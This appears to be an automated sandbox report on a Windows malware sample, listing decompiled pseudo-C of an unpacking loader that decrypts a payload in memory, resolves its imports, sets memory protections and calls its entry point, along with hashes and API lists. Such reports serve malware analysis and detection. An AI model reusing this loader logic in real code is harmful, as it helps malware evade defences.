Associated: 00000004.00000002.480885021.00000000030E3000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480912036.00000000030E5000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480971189.00000000030E6000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: 435395b00b1c2300a02b5d5f2822ce663e4e28029d879c2b083b5625ae35ea52
Instruction ID: 5d5fba5e33c10e609f5828bd69e29f603de3b9d32c16185ec58e06b80bfd5cf6
Opcode Fuzzy Hash: 435395b00b1c2300a02b5d5f2822ce663e4e28029d879c2b083b5625ae35ea52
Instruction Fuzzy Hash: 7CF05E3A303220BBD7216BA0AC1CF5BBE68FB48B12F044484F6859A154C73989108B91

Uniqueness

Uniqueness Score: -1.00%

Function 03117A60, Relevance: 7.8, APIs: 5, Instructions: 327COMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(00000000,00000718), ref: 03117AC8
GetCurrentDirectoryA.KERNEL32(00000718,?,0315300C), ref: 03117BB6
delete.LIBCMTD ref: 03117EB5
std::_Lockit::_Lockit.LIBCPMTD ref: 03117ED4
std::_Lockit::~_Lockit.LIBCPMTD ref: 03117EFF

Memory Dump Source

Source File: 00000004.00000002.481000123.00000000030EE000.00000020.00020000.sdmp, Offset: 030EE000, based on PE: false

Similarity

API ID: DirectoryLockitstd::_$CurrentLockit::_Lockit::~_Systemdelete
String ID:
API String ID: 4219208524-0
Opcode ID: 0bd51d82f0ec1f80db7051e40a55502121db2a3f840073d4d3ba2f710f06e06e
Instruction ID: aae714f94331ef681c21bac3491b60f16041922857a2bea8031f5c04dea4f8ea
Opcode Fuzzy Hash: 0bd51d82f0ec1f80db7051e40a55502121db2a3f840073d4d3ba2f710f06e06e
Instruction Fuzzy Hash: 7FD17F7AA04301CFC71CEF24E99079ABBE5E78C290B44893DD4A587388D770A599CFB1

Uniqueness

Uniqueness Score: -1.00%

Function 030E18AD, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 111
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E030E18AD(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				unsigned int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				void* _v36;
				signed int _v40;
				signed char _v44;
				void* _v48;
				signed int _v56;
				signed int _v60;
				intOrPtr _t50;
				void* _t57;
				void* _t61;
				signed int _t67;
				signed char _t69;
				signed char _t70;
				void* _t76;
				intOrPtr _t77;
				unsigned int _t82;
				intOrPtr _t86;
				intOrPtr* _t89;
				intOrPtr _t90;
				void* _t91;
				signed int _t93;

				_t90 =  *0x30e41b0;
				_t50 = E030E1000(_t90,  &_v28,  &_v20);
				_v24 = _t50;
				if(_t50 == 0) {
					asm("sbb ebx, ebx");
					_t67 =  ~( ~(_v20 & 0x00000fff)) + (_v20 >> 0xc);
					_t91 = _t90 + _v28;
					_v48 = _t91;
					_t57 = VirtualAlloc(0, _t67 << 0xc, 0x3000, 4); // executed
					_t76 = _t57;
					_v36 = _t76;
					if(_t76 == 0) {
						_v24 = 8;
					} else {
						_t69 = 0;
						if(_t67 <= 0) {
							_t77 =  *0x30e41cc;
						} else {
							_t86 = _a4;
							_v8 = _t91;
							_v8 = _v8 - _t76;
							_t14 = _t86 + 0x30e5137; // 0x3220a9c2
							_t61 = _t57 - _t91 + _t14;
							_v16 = _t76;
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t70 = _t69 + 1;
								_v44 = _t70;
								_t82 = (_v60 ^ _v56) + _v28 + _a4 >> _t70;
								if(_t82 != 0) {
									_v32 = _v32 & 0x00000000;
									_t89 = _v16;
									_v12 = 0x400;
									do {
										_t93 =  *((intOrPtr*)(_v8 + _t89));
										_v40 = _t93;
										if(_t93 == 0) {
											_v12 = 1;
										} else {
											 *_t89 = _t93 + _v32 - _t82;
											_v32 = _v40;
											_t89 = _t89 + 4;
										}
										_t33 =  &_v12;
										 *_t33 = _v12 - 1;
									} while ( *_t33 != 0);
								}
								_t69 = _v44;
								_t77 =  *((intOrPtr*)(_t61 + 0xc)) -  *((intOrPtr*)(_t61 + 8)) +  *((intOrPtr*)(_t61 + 4));
								_v16 = _v16 + 0x1000;
								 *0x30e41cc = _t77;
							} while (_t69 < _t67);
						}
						if(_t77 != 0x63699bc3) {
							_v24 = 0xc;
						} else {
							memcpy(_v48, _v36, _v20);
						}
						VirtualFree(_v36, 0, 0x8000); // executed
					}
				}
				return _v24;
			}

0x030e18b4
0x030e18c4
0x030e18cb
0x030e18ce
0x030e18e3
0x030e18ea
0x030e18ef
0x030e1900
0x030e1903
0x030e1909
0x030e190d
0x030e1910
0x030e19ec
0x030e1916
0x030e1916
0x030e191a
0x030e19b2
0x030e1920
0x030e1921
0x030e1926
0x030e1929
0x030e192c
0x030e192c
0x030e1933
0x030e1936
0x030e193e
0x030e193f
0x030e1940
0x030e1947
0x030e194b
0x030e1951
0x030e1955
0x030e1957
0x030e195b
0x030e195e
0x030e1965
0x030e1968
0x030e196d
0x030e1970
0x030e1986
0x030e1972
0x030e197c
0x030e197e
0x030e1981
0x030e1981
0x030e198d
0x030e198d
0x030e198d
0x030e1965
0x030e1998
0x030e199b
0x030e199e
0x030e19a7
0x030e19a7
0x030e19af
0x030e19be
0x030e19d3
0x030e19c0
0x030e19c9
0x030e19ce
0x030e19e4
0x030e19e4
0x030e19f3
0x030e19f9

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 030E1903
memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 030E19C9
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,00000000), ref: 030E19E4

Strings

Jun 6 2021, xrefs: 030E1936

Memory Dump Source

Source File: 00000004.00000002.480861932.00000000030E1000.00000020.00020000.sdmp, Offset: 030E0000, based on PE: true

Associated: 00000004.00000002.480836634.00000000030E0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480885021.00000000030E3000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480912036.00000000030E5000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480971189.00000000030E6000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Jun 6 2021
API String ID: 4010158826-1013970402
Opcode ID: 11891e78073015139aacf2db24d7ef8d63d73be57254e37493d6f45a42456e7c
Instruction ID: 17fcecab640096589d1c5c33a6b247c9ce3edb6e588db2784276f85fb361f6cb
Opcode Fuzzy Hash: 11891e78073015139aacf2db24d7ef8d63d73be57254e37493d6f45a42456e7c
Instruction Fuzzy Hash: 52418D75E02209AFDF18CF99D880AEEBBB5FF48310F188169D905BB244D775AA45CF90

Uniqueness

Uniqueness Score: -1.00%

Function 030E20CE, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E030E20CE(void* __ecx, intOrPtr _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E030E1C7D(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}

0x030e20d7
0x030e20dc
0x030e20ea
0x030e20ef
0x030e20ef
0x030e20f5
0x030e20fa
0x030e20fe
0x030e2102
0x030e2102
0x030e210c
0x030e2115

APIs

GetCurrentThread.KERNEL32 ref: 030E20D1
SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 030E20DC
SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 030E20EF
SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 030E2102

Memory Dump Source

Source File: 00000004.00000002.480861932.00000000030E1000.00000020.00020000.sdmp, Offset: 030E0000, based on PE: true

Associated: 00000004.00000002.480836634.00000000030E0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480885021.00000000030E3000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480912036.00000000030E5000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480971189.00000000030E6000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$Priority$AffinityCurrentMask
String ID:
API String ID: 1452675757-0
Opcode ID: 112d8d3d553508479d8ddb910198b38ac842701652c3ca96397041384dabd072
Instruction ID: 0f16104277f2e63355f5de31399286e381ecce7ce8752f24357579457ec5cc54
Opcode Fuzzy Hash: 112d8d3d553508479d8ddb910198b38ac842701652c3ca96397041384dabd072
Instruction Fuzzy Hash: 4BE092353076113FE621BA2D9C94EBBAB9CDF916327050265F624D71D0CF988C0589A5

Uniqueness

Uniqueness Score: -1.00%

Function 030E126D, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E030E126D(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x30e41cc;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x63699bbf;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x63699bc1;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x63699ba3;
					} else {
						_t54 = _t57 - 0x63699b83;
					}
					goto L9;
				}
				goto L12;
			}

0x030e1277
0x030e1284
0x030e128a
0x030e1296
0x030e12a6
0x030e12a8
0x030e12b0
0x030e1345
0x030e134c
0x00000000
0x00000000
0x00000000
0x030e12b6
0x030e12b6
0x030e12b6
0x030e12ba
0x00000000
0x00000000
0x030e12c6
0x030e12ca
0x030e12ee
0x030e12f2
0x030e1306
0x030e1306
0x030e130c
0x030e131b
0x030e131f
0x030e1327
0x030e1327
0x030e132f
0x030e1332
0x030e133f
0x00000000
0x00000000
0x00000000
0x00000000
0x030e133f
0x030e12fa
0x030e12fe
0x030e1304
0x00000000
0x00000000
0x00000000
0x030e1304
0x030e12d2
0x030e12d6
0x030e12e0
0x030e12d8
0x030e12d8
0x030e12d8
0x00000000
0x030e12d6
0x00000000

APIs

VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,00000002), ref: 030E12A6
VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 030E131B
GetLastError.KERNEL32 ref: 030E1321

Memory Dump Source

Source File: 00000004.00000002.480861932.00000000030E1000.00000020.00020000.sdmp, Offset: 030E0000, based on PE: true

Associated: 00000004.00000002.480836634.00000000030E0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480885021.00000000030E3000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480912036.00000000030E5000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480971189.00000000030E6000.00000002.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: e2195fb66c646952894871002191746419317e13b7f7f6e0b907881588dc6473
Instruction ID: f7f964f5e4b4f2f9b36cb99942744646417be8b883904d610a9675922188bd2d
Opcode Fuzzy Hash: e2195fb66c646952894871002191746419317e13b7f7f6e0b907881588dc6473
Instruction Fuzzy Hash: D3219771D01207EFCB18DFA9C881EAAF7F9FF08319F004999D01697544E3B8A694CB94

Uniqueness

Uniqueness Score: -1.00%

Function 030E14E8, Relevance: 4.6, APIs: 3, Instructions: 60
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E030E14E8() {
				char _v28;
				void _v44;
				char _v48;
				void* _v52;
				long _t23;
				int _t24;
				void* _t28;
				intOrPtr* _t30;
				signed int _t34;
				intOrPtr _t36;

				_push(0);
				_push(0x30e41c4);
				_push(1);
				_push( *0x30e41d0 + 0x30e5089);
				 *0x30e41c0 = 0xc;
				 *0x30e41c8 = 0; // executed
				L030E1DA8(); // executed
				_t34 = 6;
				memset( &_v44, 0, _t34 << 2);
				if(E030E1697( &_v44,  &_v28,  *0x30e41cc ^ 0xfd7cd1cf) == 0) {
					_t23 = 0xb;
					L7:
					ExitThread(_t23);
				}
				_t24 = lstrlenW( *0x30e41b8);
				_t7 = _t24 + 2; // 0x2
				_t10 = _t24 + _t7 + 8; // 0xa
				_t28 = E030E1144(_t36, _t10,  &_v48,  &_v52); // executed
				if(_t28 == 0) {
					_t30 = _v52;
					 *_t30 = 0;
					if( *0x30e41b8 == 0) {
						 *((short*)(_t30 + 4)) = 0;
					} else {
						E030E2118(_t40, _t30 + 4);
					}
				}
				_t23 = E030E1444(_v44); // executed
				goto L7;
			}

0x030e14fa
0x030e14fb
0x030e1500
0x030e1508
0x030e1509
0x030e1513
0x030e1519
0x030e1522
0x030e1527
0x030e1545
0x030e159a
0x030e159b
0x030e159c
0x030e159c
0x030e154d
0x030e1553
0x030e1561
0x030e1565
0x030e156c
0x030e1574
0x030e1578
0x030e157a
0x030e1589
0x030e157c
0x030e1582
0x030e1582
0x030e157a
0x030e1591
0x00000000

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,030E41C4,00000000), ref: 030E1519
lstrlenW.KERNEL32(?,?,?), ref: 030E154D

Part of subcall function 030E1144: GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,030E156A,0000000A,?,?), ref: 030E1151
Part of subcall function 030E1144: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 030E1167
Part of subcall function 030E1144: _snwprintf.NTDLL ref: 030E118C
Part of subcall function 030E1144: CreateFileMappingW.KERNELBASE(000000FF,030E41C0,00000004,00000000,?,?), ref: 030E11B1
Part of subcall function 030E1144: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,030E156A,0000000A,?), ref: 030E11C8
Part of subcall function 030E1144: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,030E156A,0000000A), ref: 030E11FD

ExitThread.KERNEL32 ref: 030E159C

Memory Dump Source

Source File: 00000004.00000002.480861932.00000000030E1000.00000020.00020000.sdmp, Offset: 030E0000, based on PE: true

Associated: 00000004.00000002.480836634.00000000030E0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480885021.00000000030E3000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480912036.00000000030E5000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480971189.00000000030E6000.00000002.00020000.sdmp Download File

Similarity

API ID: DescriptorFileSecurityTime$CloseConvertCreateErrorExitHandleLastMappingStringSystemThread_aulldiv_snwprintflstrlen
String ID:
API String ID: 4209869662-0
Opcode ID: 90789ac9b5c7e09e7acf2d5643eb0961f46fbaf4a47fe9758ba07acd349e8a08
Instruction ID: c0c045c6e98afb213107884929e34c7d40698fc283db85856607903c494a186f
Opcode Fuzzy Hash: 90789ac9b5c7e09e7acf2d5643eb0961f46fbaf4a47fe9758ba07acd349e8a08
Instruction Fuzzy Hash: 96118E76706305EFDB14EB6AC844E9BBBECAB84B00F050966F125DB140D734E5448B92

Uniqueness

Uniqueness Score: -1.00%

Function 03120860, Relevance: 4.6, APIs: 3, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(031681A8,00000000,00000001), ref: 031208B6

Part of subcall function 03123490: ___crtCorExitProcess.LIBCMTD ref: 03123497
Part of subcall function 03123490: ExitProcess.KERNEL32 ref: 031234A3

Memory Dump Source

Source File: 00000004.00000002.481000123.00000000030EE000.00000020.00020000.sdmp, Offset: 030EE000, based on PE: false

Similarity

API ID: ExitProcess$AllocateHeap___crt
String ID:
API String ID: 2561786895-0
Opcode ID: 9efbde92543ee43af8b5ba6202d0c8ff3f3ff01e3ef79126b1ff14aafc541f22
Instruction ID: daabfb203201bbfdb2f4fa6b3cab9044ba6f498d3ae44adb9c6599fe8a613841
Opcode Fuzzy Hash: 9efbde92543ee43af8b5ba6202d0c8ff3f3ff01e3ef79126b1ff14aafc541f22
Instruction Fuzzy Hash: 19112E74D00258EFEF18EFA4E8887AA7FB4AB0C315F144259FD054A281D7B19AE4CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 030E1F7C, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E030E1F7C(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x30e41cc;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x63699bc3;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x63699b44;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x63699bc3;
										}
										 *_v16 = _t55;
										_t58 = 0x725990f8 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x9c9664bb;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

0x030e1f7c
0x030e1f85
0x030e1f8a
0x030e1f90
0x030e1f99
0x030e1f9f
0x030e1fa1
0x030e1fa4
0x030e1fa9
0x030e1fb0
0x030e1fb0
0x030e1fb4
0x030e1fbc
0x030e1fbf
0x00000000
0x00000000
0x030e1fc5
0x030e1fcf
0x030e1fd1
0x030e1fd4
0x030e1fd7
0x030e1fdb
0x030e1fe3
0x030e1fe5
0x030e1fe8
0x030e2050
0x030e2050
0x030e2054
0x00000000
0x00000000
0x030e1fed
0x030e1ff3
0x030e1ff5
0x030e2008
0x030e200b
0x030e200b
0x030e200b
0x030e200f
0x030e1ff7
0x030e1ff7
0x030e1fff
0x030e2001
0x00000000
0x00000000
0x00000000
0x00000000
0x030e2001
0x030e1fef
0x030e1fef
0x030e2003
0x030e2003
0x030e2003
0x030e2012
0x030e2015
0x030e2017
0x030e201e
0x030e2019
0x030e2019
0x030e2019
0x030e2026
0x030e202c
0x030e202e
0x030e205e
0x030e2030
0x030e2030
0x030e2033
0x030e2035
0x030e203d
0x030e203d
0x030e2042
0x030e2044
0x030e204b
0x030e204d
0x030e204d
0x030e204d
0x00000000
0x030e204d
0x00000000
0x030e202e
0x030e1fdd
0x030e1fdf
0x030e1fe1
0x00000000
0x00000000
0x030e1fe1
0x030e2061
0x030e2061
0x030e2068
0x030e206d
0x00000000
0x00000000
0x030e2073
0x030e207e
0x00000000
0x030e207e
0x030e2075
0x030e2075
0x030e207b
0x00000000
0x030e207b
0x030e1fa9
0x030e207f
0x030e2084

APIs

LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 030E1FB4
GetProcAddress.KERNEL32(?,00000000), ref: 030E2026

Memory Dump Source

Source File: 00000004.00000002.480861932.00000000030E1000.00000020.00020000.sdmp, Offset: 030E0000, based on PE: true

Associated: 00000004.00000002.480836634.00000000030E0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480885021.00000000030E3000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480912036.00000000030E5000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480971189.00000000030E6000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: d0e7c61e76e575da3fd82e99b156d9590cf2588d30c3bdbbf9fac68353724e08
Instruction ID: 6df7c2404b8f5cac0540381fe7bc8082a95ea28572dfee3cdd3cc44dcba52945
Opcode Fuzzy Hash: d0e7c61e76e575da3fd82e99b156d9590cf2588d30c3bdbbf9fac68353724e08
Instruction Fuzzy Hash: 19313B71B0220ADFDB54DF59C884AAEB7FCBF44302B1848AAD845E7286E774DA41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 030E1ADB, Relevance: 2.5, APIs: 2, Instructions: 48
memoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E030E1ADB(void* __ecx) {
				void* _v8;
				char _v12;
				char* _t18;
				char* _t25;
				char* _t29;

				_t22 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t25 = 0;
				if(E030E1697( &_v8,  &_v12,  *0x30e41cc ^ 0x196db149) != 0) {
					if(_v8 == 0) {
						_t29 = 0;
					} else {
						_t29 = E030E2087(_t22, _v8,  *0x30e41cc ^ 0x6e49bbff);
					}
					if(_t29 != 0) {
						_v12 = E030E1E8A(_t22) & 0x0000ffff;
						_t18 = StrStrIA(_t29,  &_v12); // executed
						if(_t18 != 0) {
							_t25 = 0x657;
						}
					}
					HeapFree( *0x30e4190, 0, _v8);
				}
				return _t25;
			}

0x030e1adb
0x030e1ade
0x030e1adf
0x030e1af5
0x030e1afe
0x030e1b03
0x030e1b1c
0x030e1b05
0x030e1b18
0x030e1b18
0x030e1b20
0x030e1b2a
0x030e1b32
0x030e1b3a
0x030e1b3c
0x030e1b3c
0x030e1b3a
0x030e1b4c
0x030e1b4c
0x030e1b57

APIs

StrStrIA.KERNELBASE(00000000,030E1CE6,?,030E1CE6,?,00000000,00000000,?,?,?,030E1CE6), ref: 030E1B32
HeapFree.KERNEL32(00000000,?,?,030E1CE6,?,00000000,00000000,?,?,?,030E1CE6), ref: 030E1B4C

Memory Dump Source

Source File: 00000004.00000002.480861932.00000000030E1000.00000020.00020000.sdmp, Offset: 030E0000, based on PE: true

Associated: 00000004.00000002.480836634.00000000030E0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480885021.00000000030E3000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480912036.00000000030E5000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480971189.00000000030E6000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 588bd36b57fad04f7cbbbbe3cc475054b9830830fe6c474659e6c0943b370193
Instruction ID: 40377b5030b8523f1781c0991b1562b17898596650d21417df3b0157030f4b57
Opcode Fuzzy Hash: 588bd36b57fad04f7cbbbbe3cc475054b9830830fe6c474659e6c0943b370193
Instruction Fuzzy Hash: E801447AB03114FFCB15EBA6DC40E9FBBEDDB84641F1941A1A901EB144E635DA019AA0

Uniqueness

Uniqueness Score: -1.00%

Function 0311FDE0, Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

__encode_pointer.LIBCMTD ref: 0311FDE5

Part of subcall function 0311FD50: TlsGetValue.KERNEL32(03153D3C,00000000), ref: 0311FD63
Part of subcall function 0311FD50: TlsGetValue.KERNEL32(03153D3C,03153D38), ref: 0311FD84
Part of subcall function 0311FD50: GetModuleHandleA.KERNEL32(0314C518), ref: 0311FD9A
Part of subcall function 0311FD50: GetProcAddress.KERNEL32(00000000,0314C508), ref: 0311FDB2
Part of subcall function 0311FD50: RtlEncodePointer.NTDLL(?), ref: 0311FDD3

Memory Dump Source

Source File: 00000004.00000002.481000123.00000000030EE000.00000020.00020000.sdmp, Offset: 030EE000, based on PE: false

Similarity

API ID: Value$AddressEncodeHandleModulePointerProc__encode_pointer
String ID:
API String ID: 1150849369-0
Opcode ID: 68a6a37907ab473acd99106e34f8a50d25f70ac82cbaf87fdb11b38c9d560ded
Instruction ID: 834d9b1cbc6b6191f7babbb60d7e59078a608e23f26de4b1de0494ddfa5f0258
Opcode Fuzzy Hash: 68a6a37907ab473acd99106e34f8a50d25f70ac82cbaf87fdb11b38c9d560ded
Instruction Fuzzy Hash: D8A022AA88830C23E80030C23C0BB22320C0300838F080030EA0C0C2A2B883B03000E3

Uniqueness

Uniqueness Score: -1.00%

Function 030E1444, Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E030E1444(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x30e41cc;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x30e41cc - 0x63698bc4 &  !( *0x30e41cc - 0x63698bc4);
				_t18 = E030E1060( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x30e41cc - 0x63698bc4 &  !( *0x30e41cc - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x30e41cc - 0x63698bc4 &  !( *0x30e41cc - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E030E1A5A(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E030E1F7C(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E030E126D(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E030E142F(_t42);
					L8:
					return _t29;
				}
			}

0x030e144c
0x030e144e
0x030e146a
0x030e147b
0x030e1482
0x030e14e0
0x00000000
0x030e1484
0x030e1484
0x030e148e
0x030e1492
0x030e1497
0x030e149a
0x030e149f
0x030e14a3
0x030e14a8
0x030e14ad
0x030e14b1
0x030e14b6
0x030e14b7
0x030e14bb
0x030e14c0
0x030e14c8
0x030e14c8
0x030e14c0
0x030e14b1
0x030e14a3
0x030e14ca
0x030e14d3
0x030e14d7
0x030e14e1
0x030e14e7
0x030e14e7

APIs

Part of subcall function 030E1060: GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,030E1480,?,?,?,?,00000002,00000000,?,?), ref: 030E1084
Part of subcall function 030E1060: GetProcAddress.KERNEL32(00000000,?), ref: 030E10A6
Part of subcall function 030E1060: GetProcAddress.KERNEL32(00000000,?), ref: 030E10BC
